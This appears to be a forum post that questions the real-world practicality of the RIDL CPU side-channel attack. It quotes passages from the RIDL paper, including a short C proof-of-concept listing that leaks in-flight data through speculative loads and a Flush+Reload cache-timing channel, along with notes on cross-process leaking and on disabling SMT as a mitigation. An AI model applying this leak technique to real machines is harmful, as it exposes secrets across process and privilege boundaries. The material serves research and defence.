There are things that are pertinent at any level which are omitted - they don't mention how they target a specific process or even if that is important in the JS example though show elsewhere a filter used to target specific information but in realistic circumstances even if they got that far they are unlikely to return anything but noise unless the attacker has inside information to use as a reference. They omit several aspects in each example critical to making them reality such as the more easy example with passwd which requires no programming knowledge to understand where their technique while academically interesting (more effective than a dictionary attack never mind pure brute force) is easily defeated by the same standard denial of service and anti-brute force protection but they don't mention that.
Figure2illustrates the main steps and the underlying mechanism enabling the RIDL leaks. First, as part of its normal execution, the victim code, in another security domain, loads or stores some secret data4. Internally,the CPU performs the load or store via some internal buffers—for example,Line Fill Buffers(LFBs). Then,when the attacker also performs a load, the processor speculatively uses in-flight data from the LFBs (with noa ddressing restrictions) rather than valid data. Finally, by using the speculatively loaded data as an index into aFlush + Reload buffer (or any other covert channel),attackers can extract the secret value.
A simple example of our attack is shown in Listing1.As shown in the listing, the code is normal, straight-line code without invalid accesses (or, indeed, error suppression), which, as we will show, can also be implemented in managed languages such as JavaScript. Lines 2–3 only flush the buffer that we will later use in our covert channel to leak the secret that we speculatively access in Line 6.Specifically, when executing Line 6, the CPU speculatively loads a value from memory in the hope it is from our newly allocated page, while really it is in-flight data from the LFBs belonging to an arbitrarily different security domain.
1/* Flush flush & reload buffer entries. */
2for(k=0; k<256;++k)
3flush(buffer+k*1024);
4
5/* Speculatively load the secret. */
6charvalue=*(new_page);
7/* Calculate the corresponding entry. */
8char*entry_ptr=buffer+(1024*value);
9/* Load that entry into the cache. */
10*(entry_ptr);
11
12/* Time the reload of each buffer entry to
13see which entry is now cached. */
14for(k=0; k<256;++k) {
15t0=cycles();
16*(buffer+1024*k);
17dt=cycles()-t0;
18
19if(dt<100)
20++results[k];
21}
Listing 1: An example of RIDL leaking in-flight data.
When the processor eventually detects the incorrect speculative load, it will discard any and all modifications to registers or memory, and restart execution at Line 6 with the right value. However, since traces of the speculatively executed load still exist at the micro-architectural level (in the form of the corresponding cache line), we can observe the leaked in-flight data using a simple (Flush + Reload) covert channel—no different from that of other speculative execution attacks. In fact,the rest of the code snippet is all about the covert channel.Lines 8-10 speculatively access one of the entries in the buffer, using the leaked in-flight data as an index. Asa result, the corresponding cache line will be present.Lines 12-21 then access all the entries in our buffer to see if any of them are significantly faster (indicating that the cache line is present)—the index of which will correspond to the leaked information. Specifically, we may expect two accesses to be fast, not just the one corresponding to the leaked information. After all, when the processor discovers its mistake and restarts at Line 6 with the right value, the program will also access the buffer with this index.Our example above use demand paging for the loaded address, so the CPU restarts the execution only after handling the page-in event and bringing in a newly mapped page. Note that this is not an error condition, but rather a normal part of the OS’ paging functionality.
We found many other ways to speculatively execute code using in-flight data. In fact, the accessed address is not at all important. As an extreme example, rather than accessing a newly mapped page, Line 6 could even dereference aNULL pointer and later suppress the error (e.g., using TSX). In general, any run-time exception seems to be sufficient to induce RIDL leaks, presumably because the processor can more aggressively speculate on loads in case of exceptions.
https://mdsattacks.com/files/ridl.pdf page 4 and 5
Synchronization in part B
Conclusion:we can use serialization, contention and eviction to synchronize attacker and victim.
Cross-process attacks
In a typical real-world setting, synchronizing at the exact point when sensitive data is in-flight becomes non-trivial, as we have limited control over the victim process. Instead, by repeatedly leaking the same information and aligning the leaked bytes, we can retrieve the secret with-out requiring a hard synchronization primitive. For this purpose, we show a noise-resilient mask-sub-rotate attack technique that leaks 8 bytes from a given index at a time.
in the case of RIDL, the attacker can access any in-flight data currently streaming through internal CPU buffers without performing any check. As a result,address space, privilege, and even enclave boundaries do not represent a restriction for RIDL attacks
Mitigating RIDL in software.Since sensitive information can be leaked from sibling hardware threads, we strongly recommend disabling SMT to mitigate RIDL.
Worse, it is still possible to leak sensitive information from another privilege level within a single thread (as some of our exploits demonstrated), including information from internal CPU systems such as the MMU.